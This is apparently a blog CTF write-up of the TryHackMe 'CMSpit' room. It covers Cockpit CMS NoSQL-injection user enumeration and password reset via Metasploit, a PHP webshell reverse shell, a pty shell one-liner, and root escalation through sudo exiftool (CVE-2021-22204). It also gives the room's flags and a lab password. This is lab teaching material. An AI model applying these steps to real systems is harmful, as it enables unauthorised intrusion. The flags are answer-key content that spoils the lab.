CMSpit CTF | Tryhackme

6 min readAug 4, 2021

This is a writeup of CMSPit(Medium rated) room on tryhackme which was recently released.This room was fun and really focused on research.

Room Link

Nmap Scan

Nmap scan showed us 2 ports open
22(ssh) and 80(http)

Enumerating Web-Server

Upon visiting the website , we are greeted by a login page with a title Cockpit

A Simple Google Search revealed that cockpit is a name of a Content Management System (CMS).

Q1:- What is the name of the Content Management System (CMS) installed on the server?

Answer: cockpit

Usually the first thing I do after seeing a webserver is run a gobuster scan against the target to find directories and files. In this case gobuster was giving error and wasn’t working. So i took a look at source page to find any thing to give us a lead. Source code revealed that version of Cockpit is 0.11.1.

Cockpit version leaked through source code

Q2:- What is the version of the Content Management System (CMS) installed on the server?

Answer: 0.11.1

Researching this version revealed that all Cockpit versions before 0.11.2 are vulnerable to a NoSQL injection via the Controller/Auth.php check function. The exploit is also included in Common Vulnerabilities and Exposures (CVE) database. CVE number is CVE-2020–35846

Now that we have identified the exploit,its time to get our hands dirty. While searching for exploits, i stumbled upon a page showcasing the exploit in Ruby(Programming Language). That means we have a metasploit module available for this exploit. However i will not be getting a shell through metasploit but will only use it to enumerate users on cms and resetting their password.

Q3:-What is the path that allow user enumeration?

/auth/check allows the usernames to be dumped

Answer: /auth/check

Now I used metasploit to enumerate usernames

Open metasploit and type use multi/http/cockpit_cms_rce.Set RHOST value to target IP and and LHOST value to your IP(tun0)

Now type run and we get list of valid usernames

Q4:-How many users can you identify when you reproduce the user enumeration attack?

Answer: 4

Q5:-What is the path that allows you to change user account passwords?

/auth/newpassword generates a token(unautheticated)

Answer: /auth/newpassword

As we know that exploit allows us to reset password of a valid user so we can now reset password of admin user. Type set user admin. Now again type run and this time metasploit will reset the password for you

Now we have a set of credentials so we login the cms

Q6:-Compromise the Content Management System (CMS). What is Skidy’s email?

Answer: skidy@tryhackme.fakemail

Q7:-What is the web flag?

Now after manually Poking around things i found the “Finder” tab which allows us to read system files and upload files on the server. We get the webflag here.

Answer: thm{f158bea70731c48b05657a02aaf955626d78e9fb}

Now to get a reverse shell upload a php webshell in finder tab and remember to change the IP and PORT to your IP and port on which you will receive the connection back.

Now start a netcat listener on the port which you specified in the webshell.Then simple enter name of your webshell in url and you will receive back a connection

Stabalise your shell so it doesn’t accidently disconnects. Type the following

python -c 'import pty; pty.spawn("/bin/bash")'

Q7:-Compromise the machine and enumerate collections in the document database installed in the server. What is the flag in the database?

Now the questions states that we have to read a database to get a flag. I missed this (I know I am Lazy AF) but i still managed to get the flag by manual enumeration . Navigate to /home/stux and there list all the files. Remember to list all files (ls -la) so we can also see the hidden files in this directory. A file named .dbshell is owned by root user but we have read permission. Cat out this file and VOILA ,we get our 2nd flag and also set of credentials

Answer:- thm{c3d1af8da23926a30b0c8f4d6ab71bf851754568}

Remember that we had port 22 (ssh) open. Now we ssh into the machine using the found credentials stux : p4ssw0rdhack3d!123

Q8:-What is the user.txt flag?

Read the user flag located in stux user home directory

Answer- thm{c5fc72c48759318c78ec88a786d7c213da05f0ce}

Now this part was right in-front of me but i overlooked it at first. Sudo -l shows us that we can run exiftool as sudo without password.

Exiftool tricks were also available on gtfobins but the room wanted us to escalate our privileges using a vulnerability in exiftool itself

So after a google search , i got to know that exiftool recently had a arbitrary code execution flaw which allowed attackers to embed maliciuos code in a image and then analyzing that picture with exiftool,thus executing the harmful code

Q9:-What is the CVE number for the vulnerability affecting the binary assigned to the system user? Answer format: CVE-0000–0000

Answer:- CVE-2021–22204

CVE for this exploit is CVE is cve-2021–22204. But to find a working and understandable exploit took me some time and a lot of research. To save your time i will link the working exploit here. Now transfer the bash script on the target as follows

Q10:-What is the utility used to create the PoC file?

Answer:- djvumake (Read poc of exploit then you’ll understand)

Now we perfrom privilege escalation by following instructions of exploit

exploit.sh ‘/bin/bash’

Then

sudo /usr/local/bin/exiftool delicate.jpg

Remember to put your respective file name

Conclusion

This room really teaches you on how to do some deep research.Also this is my first Writeup so any criticism and suggestions are welcome. Happy Hacking!

THM profile : https://tryhackme.com/p/Cyberjunkie

Github : https://github.com/CyberJunnkie

Discord : CyberJunkie#6969